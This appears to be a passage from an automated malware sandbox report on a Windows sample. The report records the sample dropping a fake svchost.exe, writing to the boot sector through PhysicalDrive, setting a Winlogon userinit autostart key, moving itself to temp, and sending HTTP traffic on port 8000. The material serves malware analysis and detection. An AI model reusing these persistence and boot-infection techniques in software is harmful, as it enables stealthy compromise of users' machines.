Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029E3CA0 push eax; ret	2_2_029E3CCE
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02B20678 push dword ptr [esp+48h]; ret	2_2_02B20747
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02B2065B push ebx; ret	2_2_02B20677
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02B2065B push dword ptr [esp+48h]; ret	2_2_02B20747
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_017828A0 push eax; ret	6_2_017828CE

Persistence and Installation Behavior

Contains functionality to infect the boot sector

Source: C:\Windows\apppatch\svchost.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	2_2_02C82030
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	6_2_01752030
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	7_2_03112030
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	10_2_01532030

Drops PE files with benign system names

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe

File created: C:\Windows\apppatch\svchost.exe

Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe

Executable created and started: C:\Windows\apppatch\svchost.exe

Jump to behavior

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe

Code function: API: WriteFile string: \\?\globalroot\systemroot\system32\tasks\

0_2_00403440

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe

File created: C:\Windows\apppatch\svchost.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe

File created: C:\Windows\apppatch\svchost.exe

Jump to dropped file

Boot Survival

Contains functionality to infect the boot sector

Source: C:\Windows\apppatch\svchost.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	2_2_02C82030
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	6_2_01752030
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	7_2_03112030
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u	10_2_01532030

Creates an undocumented autostart registry key

Source: C:\Windows\apppatch\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon userinit

Jump to behavior

Monitors registry run keys for changes

Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Hooking and other Techniques for Hiding and Protection

Moves itself to temp directory

Source: c:\users\user\desktop\bpfz752pyz.exe

File moved: C:\Users\user\AppData\Local\Temp\97C3.tmp

Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 58882 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 58882
Source: unknown	Network traffic detected: HTTP traffic on port 58882 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 58882
Source: unknown	Network traffic detected: HTTP traffic on port 58882 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 58882
Source: unknown	Network traffic detected: HTTP traffic on port 58882 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 58882
Source: unknown	Network traffic detected: HTTP traffic on port 64583 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 64583

Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C7C380 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,	2_2_02C7C380
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C7C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	2_2_02C7C069
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C7C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	2_2_02C7C069
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C7BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	2_2_02C7BE40
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C7BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	2_2_02C7BE40
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C7BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	2_2_02C7BE40
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C7BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	2_2_02C7BE40
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C78F20 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,	2_2_02C78F20
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C7BDD0 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,	2_2_02C7BDD0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0174C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	6_2_0174C069
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0174C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	6_2_0174C069
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0174C380 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,	6_2_0174C380
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0174BDD0 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,	6_2_0174BDD0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_01748F20 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,	6_2_01748F20
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0174BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	6_2_0174BE40
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0174BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	6_2_0174BE40
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0174BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	6_2_0174BE40
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0174BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	6_2_0174BE40
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0310C380 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,	7_2_0310C380
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0310C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	7_2_0310C069
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0310C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	7_2_0310C069
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_03108F20 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,	7_2_03108F20
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0310BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	7_2_0310BE40
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0310BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	7_2_0310BE40
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0310BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	7_2_0310BE40
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0310BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	7_2_0310BE40
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0310BDD0 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,	7_2_0310BDD0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0152C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	10_2_0152C069
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0152C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	10_2_0152C069
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0152C380 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,	10_2_0152C380
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0152BDD0 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,	10_2_0152BDD0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_01528F20 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,	10_2_01528F20
